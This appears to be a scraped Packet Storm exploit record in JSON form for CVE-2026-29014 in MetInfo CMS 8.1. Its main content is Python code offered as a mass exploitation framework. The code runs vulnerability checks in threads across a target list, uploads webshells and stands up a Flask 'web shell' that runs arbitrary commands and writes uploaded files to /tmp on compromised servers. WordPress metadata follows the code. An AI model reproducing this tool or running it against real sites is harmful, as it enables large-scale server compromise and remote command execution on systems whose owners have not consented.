{“lastseen”:”2026-04-24T20:46:21″,”description”:”This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter”,”source”:””,”references”:””,”id”:”PACKETSTORM:219759″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-29014″],”sourceData”:”==================================================================================================================================\\n | # Title : MetInfo CMS 8.1 Mass Exploitation \\u0026 Web Shell Framework |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.metinfo.cn |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import threading\\n import queue\\n import json\\n from concurrent.futures import ThreadPoolExecutor, as_completed\\n \\n \\n class MetInfoMassExploit:\\n \\”\\”\\”Mass exploitation for multiple targets\\”\\”\\”\\n \\n def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):\\n self.targets = self.load_targets(targets_file)\\n self.threads = threads\\n self.output_file = output_file\\n self.results = []\\n self.lock = threading.Lock()\\n self.exploit_class = exploit_class\\n \\n def load_targets(self, file_path):\\n \\”\\”\\”Load targets from file\\”\\”\\”\\n targets = []\\n with open(file_path, ‘r’) as f:\\n for line in f:\\n line = line.strip()\\n if line and not line.startswith(‘#’):\\n targets.append(line)\\n return targets\\n \\n def exploit_single(self, target_url):\\n \\”\\”\\”Exploit a single target\\”\\”\\”\\n try:\\n if not self.exploit_class:\\n return None\\n \\n exploit = self.exploit_class(target_url, verbose=False)\\n \\n if exploit.check_vulnerability():\\n result = {\\n ‘url’: target_url,\\n ‘vulnerable’: True\\n }\\n \\n if hasattr(exploit, \\”get_system_info\\”):\\n try:\\n result[‘info’] = exploit.get_system_info()\\n except:\\n result[‘info’] = None\\n \\n if hasattr(exploit, \\”upload_webshell\\”):\\n try:\\n webshell = exploit.upload_webshell()\\n if webshell:\\n result[‘webshell’] = webshell\\n except:\\n pass\\n \\n self.log_result(result)\\n return result\\n \\n else:\\n self.log_result({‘url’: target_url, ‘vulnerable’: False})\\n return None\\n \\n except Exception as e:\\n self.log_result({\\n ‘url’: target_url,\\n ‘vulnerable’: False,\\n ‘error’: str(e)\\n })\\n return None\\n \\n def log_result(self, result):\\n \\”\\”\\”Log result with thread safety\\”\\”\\”\\n with self.lock:\\n self.results.append(result)\\n \\n if result.get(‘vulnerable’):\\n print(f\\”[+] VULNERABLE: {result.get(‘url’)}\\”)\\n if result.get(‘webshell’):\\n print(f\\” Webshell: {result.get(‘webshell’)}\\”)\\n else:\\n print(f\\”[-] Not vulnerable: {result.get(‘url’)}\\”)\\n \\n def run(self):\\n \\”\\”\\”Run mass exploitation\\”\\”\\”\\n print(f\\”[*] Loaded {len(self.targets)} targets\\”)\\n print(f\\”[*] Using {self.threads} threads\\”)\\n \\n with ThreadPoolExecutor(max_workers=self.threads) as executor:\\n futures = [\\n executor.submit(self.exploit_single, url)\\n for url in self.targets\\n ]\\n \\n for future in as_completed(futures):\\n try:\\n future.result()\\n except Exception:\\n pass\\n if self.output_file:\\n with open(self.output_file, ‘w’) as f:\\n json.dump(self.results, f, indent=2)\\n \\n print(f\\”[*] Results saved to {self.output_file}\\”)\\n \\n vulnerable_count = sum(1 for r in self.results if r.get(‘vulnerable’))\\n print(f\\”\\\\n[*] Summary: {vulnerable_count}\/{len(self.targets)} targets vulnerable\\”)\\n class MetInfoWebShell:\\n \\”\\”\\”Web-based shell interface using Flask\\”\\”\\”\\n \\n def __init__(self, exploit_instance):\\n self.exploit = exploit_instance\\n self.app = None\\n \\n def start(self, host=’0.0.0.0′, port=8080):\\n \\”\\”\\”Start web shell server\\”\\”\\”\\n try:\\n from flask import Flask, request, render_template_string\\n import base64 # FIX: missing import\\n \\n app = Flask(__name__)\\n \\n TEMPLATE = ”’\\n \\u003chtml\\u003e\\n \\u003cbody\\u003e\\n \\u003ch2\\u003eMetInfo Web Shell\\u003c\/h2\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cinput type=\\”text\\” name=\\”cmd\\”\\u003e\\n \\u003cinput type=\\”submit\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n {% if output %}\\n \\u003cpre\\u003e{{ output }}\\u003c\/pre\\u003e\\n {% endif %}\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n ”’\\n \\n @app.route(‘\/’, methods=[‘GET’, ‘POST’])\\n def index():\\n output = \\”\\”\\n \\n if request.method == ‘POST’:\\n if ‘cmd’ in request.form:\\n cmd = request.form[‘cmd’]\\n output = self.exploit.execute_command(cmd) or \\”\\”\\n \\n elif ‘file’ in request.files:\\n file = request.files[‘file’]\\n if file and file.filename:\\n content = file.read()\\n b64_content = base64.b64encode(content).decode()\\n \\n remote_path = f\\”\/tmp\/{file.filename}\\”\\n self.exploit.execute_command(\\n f\\”echo ‘{b64_content}’ | base64 -d \\u003e {remote_path}\\”\\n )\\n output = f\\”Uploaded to {remote_path}\\”\\n \\n return render_template_string(TEMPLATE, output=output)\\n \\n self.app = app\\n print(f\\”[*] Web shell started at http:\/\/{host}:{port}\\”)\\n app.run(host=host, port=port)\\n \\n except ImportError:\\n print(\\”[-] Flask not installed\\”)\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219759″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219759\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-24T20:46:21″,”description”:”This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MetInfo…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-49291","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n